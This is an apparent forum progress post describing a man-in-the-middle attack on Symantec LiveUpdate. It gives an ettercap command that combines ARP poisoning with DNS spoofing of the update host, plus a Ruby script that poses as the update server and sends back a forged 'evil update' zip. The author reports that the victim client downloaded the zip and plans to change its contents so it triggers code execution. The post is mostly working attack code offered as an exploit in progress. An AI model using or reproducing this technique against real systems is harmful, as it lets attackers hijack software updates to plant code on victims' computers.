here is a quick update on what i have done so far... i was going to make a video but i see no need... the client successfully downloads the modified zip file from my computer during the dns spoof (screenshot of wireshark) i just need to modify the zip packages contents to trigger execution...
sudo ettercap -T -F filter.ef -P dns_spoof -M arp // //
first thing is the ettercap filter drops encryption for more plaintext (not sure if its needed for this situation but i like to use it)
dns_spoof: [liveupdate.symantecliveupdate.com] spoofed to [192.168.1.104]
sudo ruby exploit.rb
(its something i put together in a few minutes, dont judge me ,-P
require 'socket' #SERVER
server = TCPServer.open(80)
loop {
client = server.accept
print client.read(100) #should recive /get /minitri.flg
client.puts("HTTP/1.1 200 OK
Content-Length: 1
Content-Type: text/plain
Last-Modified: Fri, 29 Jul 2005 20:24:32 GMT
ETag: "+'"'+"1-42ea9080"+'"'+"
Accept-Ranges: bytes
Date: Sun, 15 May 2011 01:52:21 GMT
Connection: keep-alive
Cache-Control: public,must-revalidate,max-age=1800\n\r\n\r")
print client.read(100) #should recive GET /update symnetc from client
client.print("HTTP/1.1 200 OK
Content-Type: application/zip
Last-Modified: Sun, 15 May 2011 21:16:04 GMT
ETag: W/"+'"'+"15a1-4dd04294"+'"'+"
Accept-Ranges: bytes
Date: Sun, 15 May 2011 20:50:18 GMT
Connection: keep-alive
Cache-Control: public,must-revalidate,max-age=240\n\r\n\r")
#now send payload
file = open('/home/bigmac/out.zip', "rb") # new evil update
fileContent = file.read
client.print(fileContent)
#client.print "Closing the connection. Bye!"
# client.close # Disconnect from the client
}
wireshark screenshot of the zipfile downloaded 192.168.1.102 <---> 192.168.1.104
img838.imageshack.us/i/screenshotwireshark.png
... i should post the zipfile, im sure all that is needed is changing a few numbers around to trigger execution